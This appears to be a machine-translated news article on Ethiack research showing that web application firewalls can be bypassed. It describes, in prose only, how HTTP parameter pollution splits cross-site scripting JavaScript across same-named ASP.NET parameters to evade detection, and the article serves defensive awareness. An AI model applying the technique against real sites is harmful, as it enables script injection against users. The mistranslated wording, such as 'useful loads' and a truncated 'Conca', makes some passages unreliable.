- Ethiack recently tested 17 different WAF configurations of large suppliers
- As the complexity of useful loads increased, the success rate of the bypass of WAF increased spectacularly
- Even the most sophisticated waf could be defeated with relatively simple useful loads
Web application firewalls (WAF) are not as resilient as organizations have been led to assume and can often be bypassed to inject malicious JavaScript, experts warned.
Security researchers, Ethiack, recently tested 17 different WAF configurations of main suppliers to see how much they manage to block useful malicious loads.
The in -depth relationship was centered on a real world penetration test against Asp.net Applications protected by a highly restrictive WAF. However, despite the configuration of the firewall, the researchers discovered that they could abuse vulnerabilities of cross scripts (XSS) thanks to a technique called pollution of HTTP parameters.
Analyze the parameters in isolation
This method abuses the way in which the different web frames manage several parameters with the same name, the crushing often in a way that can be manipulated to inject a malicious javascript code.
Ethiack said that as the complexity of useful charges increased, the WAF bypass success rate has increased spectacularly. For simple injections, they had a success rate of 17.6%, increasing more than 70% for advanced techniques of “pollution by parameters”.
Even WAF based on automatic learning, designed to detect new threats, were vulnerable to subtle analysis tips and obscure, it was said. But the most surprising discovery of Ethiack was that even the most sophisticated WAF could be defeated with relatively simple useful loads.
The problem with WAF seems to be that they analyze the parameters in isolation, based strongly on the correspondence of the models.
Consequently, they are blind to the nuanced ways of web analysis applications and interpret entry. For example, ASP.NET Conca of double parameters with commas, and JavaScript treats expressions separated by commas such as a valid executable code.
By making useful loads that divide the malicious code on several parameters, the researchers were able to circumvent the detection and execute JavaScript in the browser.
“This observation has highlighted a critical vulnerability in basic security strategies: organizations can invest in costly WAF technologies while remaining vulnerable to attacks that exploit the basic implementation gaps or configuration supervisors,” concluded researchers.
“This reminds us that WAF should not be used as a correction of the root problems of the insecure code.”
